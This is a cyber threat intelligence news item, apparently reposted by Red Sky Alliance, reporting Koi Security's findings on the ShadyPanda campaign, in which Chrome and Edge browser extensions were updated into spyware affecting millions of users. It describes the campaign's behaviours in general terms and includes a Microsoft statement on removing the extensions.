A long-running malware operation that has evolved over several years has been turning browser extensions in Chrome and Edge into spyware through updates that added malicious functionalities. According to a report from Koi Security, the ShadyPanda campaign affects 4.3 million users who downloaded these now compromised browser extensions.
The ShadyPanda campaign consists of 20 malicious extensions on the Chrome Web Store and 125 in Edge; initial submissions of the extensions appeared in 2018, and the first signs of malicious behavior didn’t show up until five years later when a set of them posing as wallpaper and productivity tools began to show signs that something was amiss.[1]
|
Note: Microsoft has reached out to Amber Bouman regarding this story and has issued the following update: "We have removed all the extensions identified as malicious on Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement" |
According to Koi Security, the malware campaign rolled out slowly, in phases, through the auto updated mechanism that is designed to keep users safe: “Chrome and Edge’s trusted update pipeline silently delivered malware to users. No phishing. No social engineering. Just trusted extensions with quiet version bumps that turn productivity tools into surveillance platforms.”
Here's everything you need to know about this massive malicious extension campaign along with what steps you can take to secure your browser and your data right now.
The extensions begin their malicious activity by injecting tracking codes into legitimate links, which allowed them to earn revenue off of users' purchases. Search hijacking, where search queries are redirected, was also one of the behaviors the researchers saw. Search queries were logged, monetized, sold, manipulated and exfiltrated.
ShadyPanda can collect a range of personal information from users including browsing history, search queries, keystrokes, cookies, local and session storage, fingerprint data, and mouse clicks with coordinates. The extensions that had gained a “good” reputation were modified throughout the years to include a backdoor update that permitted an hourly remote code execution; downloading and executing arbitrary JavaScript with full browser access. This means they were capable of monitoring every website a user visited and exfiltrating browsing URLs, fingerprinting information and persistent identifiers.
Most concerningly, the extensions were able to stage adversary in the middle (AitM) attacks which means they could facilitate credential theft, session hijacking and injecting code into any website. Additionally, any attempt to access the browser’s developer tools will cause it to switch to benign behavior.
While Google has since removed the extensions from the web store, Koi Security noticed the active campaign in the Microsoft Edge Add-ons platform with one extension listed as having 3 million installs.* There is no way of telling if those are inflated numbers, intended to create a sense of legitimacy though.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.msn.com/en-us/news/technology/over-4-million-users-hit-with-spyware-that-can-turn-your-browser-extensions-into-malware-how-to-stay-safe/ar-AA1RA9cQ/
Comments